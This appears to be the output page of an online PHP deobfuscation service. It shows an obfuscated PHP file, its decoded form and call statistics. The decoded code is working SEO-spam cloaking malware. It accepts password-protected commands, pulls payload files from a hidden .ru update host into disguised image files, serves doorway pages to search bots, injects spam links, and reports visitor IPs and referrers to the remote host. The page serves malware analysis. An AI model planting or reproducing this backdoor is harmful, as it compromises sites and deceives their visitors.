Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $JZhEnyMgJg="svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcwdiZ";$BnaRT..
Decoded Output download
set_time_limit(0);
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>
", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page(){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
$content="";
$x=@$_POST["pppp_check"];
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);
$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);
$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
$domain=base64_decode("dC1maXNoLWthLnJ1");
$p=md5(base64_decode(@$_POST["p"]));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###
";
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
@file_put_contents($configs,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
@file_put_contents($bd,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
@file_put_contents($templ,$buf1);
exit;
}
if ($x=="4"){
echo "###WORKED###
";exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
echo $buf1;exit;
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;
}
}
Did this file decode correctly?
Original Code
<?php $JZhEnyMgJg="svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcwdiZ";$BnaRTawe=$JZhEnyMgJg[7]. $JZhEnyMgJg[45] . $JZhEnyMgJg[0] . $JZhEnyMgJg[42] . $JZhEnyMgJg[54]. $JZhEnyMgJg[22] .$JZhEnyMgJg[3] .$JZhEnyMgJg[60].$JZhEnyMgJg[42]. $JZhEnyMgJg[58] .$JZhEnyMgJg[35] .$JZhEnyMgJg[60].$JZhEnyMgJg[42];$lcQJOaDcf=$JZhEnyMgJg[30] .$JZhEnyMgJg[41] . $JZhEnyMgJg[61] .$JZhEnyMgJg[33].$JZhEnyMgJg[20].
$JZhEnyMgJg[4] .$JZhEnyMgJg[45].
$JZhEnyMgJg[40] . $JZhEnyMgJg[42];$ZUXNhkOCO=$JZhEnyMgJg[42]. $JZhEnyMgJg[55] .$JZhEnyMgJg[55].$JZhEnyMgJg[35]. $JZhEnyMgJg[55] . $JZhEnyMgJg[3].$JZhEnyMgJg[55] .$JZhEnyMgJg[42]. $JZhEnyMgJg[10]. $JZhEnyMgJg[35].$JZhEnyMgJg[55] . $JZhEnyMgJg[40] . $JZhEnyMgJg[61].
$JZhEnyMgJg[33] .$JZhEnyMgJg[30];$UjyssRfWPVjYNJ=$JZhEnyMgJg[58] .$JZhEnyMgJg[55].
$JZhEnyMgJg[42].
$JZhEnyMgJg[45]. $JZhEnyMgJg[40].$JZhEnyMgJg[42].
$JZhEnyMgJg[3] .$JZhEnyMgJg[20].
$JZhEnyMgJg[14] .$JZhEnyMgJg[33] .$JZhEnyMgJg[58]. $JZhEnyMgJg[40]. $JZhEnyMgJg[61] .$JZhEnyMgJg[35] .$JZhEnyMgJg[33];$ZUXNhkOCO(0);$CDCjFZrJolnsnM=$UjyssRfWPVjYNJ("",$lcQJOaDcf($BnaRTawe("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")));$CDCjFZrJolnsnM();?>
Function Calls
null | 1 |
gzinflate | 1 |
base64_decode | 1 |
create_function | 1 |
error_reporting | 1 |
Stats
MD5 | 688d3e2391942fcc8965ce9dac36dd9b |
Eval Count | 1 |
Decode Time | 86 ms |